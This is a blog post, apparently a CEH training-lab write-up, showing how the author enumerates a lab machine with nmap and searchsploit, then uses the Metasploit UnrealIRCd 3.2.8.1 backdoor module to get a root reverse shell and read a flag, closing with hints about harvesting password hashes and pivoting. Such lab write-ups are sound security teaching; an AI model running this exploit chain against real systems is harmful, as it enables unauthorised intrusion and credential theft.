Maq 106

May 12, 2018·
Jeff Soczek
Jeff Soczek
· 4 min read

This was one of the first machines done during the CEH course. The virtual machine available in my classes was a copy of another existent in the lab so, when I finally got access to the lab, I merely replicated the actions done in the VM and this let the description of the machine in the lab pass unnoticed. Had I done a decent job during the enumeration phase, I wouldn’t have lost time looking for a machine with the resources later needed. Were this be the OSCP test I’d be in trouble.

So one of the lessons learned here was: information gathering, footprinting and scanning must be really well done as it saves time in the future.

Maq106 – MÁQUINA

Descrição: Procure descobrir o(s) ponto(s) de vulnerabilidade(s) desta máquina e capture a flag!

A máquina pode esconder segredos interessantes para comprometer outras máquinas no Laboratório de Pentest

Let’s start seeing what are we dealing with. I have an IP address and nothing else.
I’ll look for the running OS and for any open ports.

root@parrot:~# nmap -O -sV
Nmap scan report for
Host is up (0.0071s latency).
Not shown: 994 closed ports
22/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
53/tcp open domain ISC BIND 9.5.1-P3
80/tcp open http Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch)
111/tcp open rpcbind 2 (RPC #100000)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc UnrealIRCd
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux\_kernel
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 20.90 seconds

Good enough, it’s a Debian and we have a few known services running there. The one odd here is this irc. So is the one I’ll start poking.

root@parrot:~# locate \*.nse | grep irc

A script for the same irc server we have. Let’s see what this irc-unrealircd-backdoor.nse can show us.

root@parrot:~# nmap -p6667 --script irc-unrealircd-backdoor.nse
Nmap scan report for
Host is up (0.0075s latency).
6667/tcp open irc
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See
Nmap done: 1 IP address (1 host up) scanned in 9.99 seconds

Right, the service is vulnerable, just let me check the irc service version before proceeding.

root@parrot:~# nmap -p6667 --script irc-info.nse
Nmap scan report for
Host is up (0.039s latency).
6667/tcp open irc
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server:
| version: Unreal3.2.8.1.
| uptime: 1 days, 5:14:01
| source ident: nmap
| source host: 5970F2CA.18AECCC8.1C965CCA.IP
|_ error: Closing Link: ijfqofavr\[\] (Quit: ijfqofavr)
Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds

We already had the service name, now we have the version too. Let’s check if we already have an exploit ready for this version.

root@parrot:~# searchsploit unrealirc
------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------- ----------------------------------------
UnrealIRCd - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
UnrealIRCd - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
UnrealIRCd - Remote Downloader/Execute | exploits/linux/remote/
UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/
------------------------------------------------------------- ----------------------------------------

I’ll cut the chase straight to the Metasploit, pick the script shown above and set it’s options.

root@parrot:~# service postgresql start
root@parrot:~# msfconsole
msf > search unrealirc
Matching Modules
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/irc/unreal\_ircd\_3281\_backdoor 2010-06-12 excellent UnrealIRCD Backdoor Command Execution
msf > use exploit/unix/irc/unreal\_ircd\_3281\_backdoor
msf exploit(unix/irc/unreal\_ircd\_3281\_backdoor) > set RHOST

Ready to run the exploit.

msf > exploit
[*] Started reverse TCP double handler on
[*] - Connected to NOTICE AUTH :*** Looking up your hostname... NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ealfLbzJRfkl7r18;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ealfLbzJRfkl7r18\\r\\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened ( -> at 2018-04-24 09:21:40 -0300
cat /root/flag.txt

The exploit finished and I typed this whoami to check the prompt. I am root. I finished reading the flag.txt content (it’s not the real one here) but the machine is owned. You can do anything now, like seeing the other users available and their encrypted passwords or maybe even other networks this machine can reach…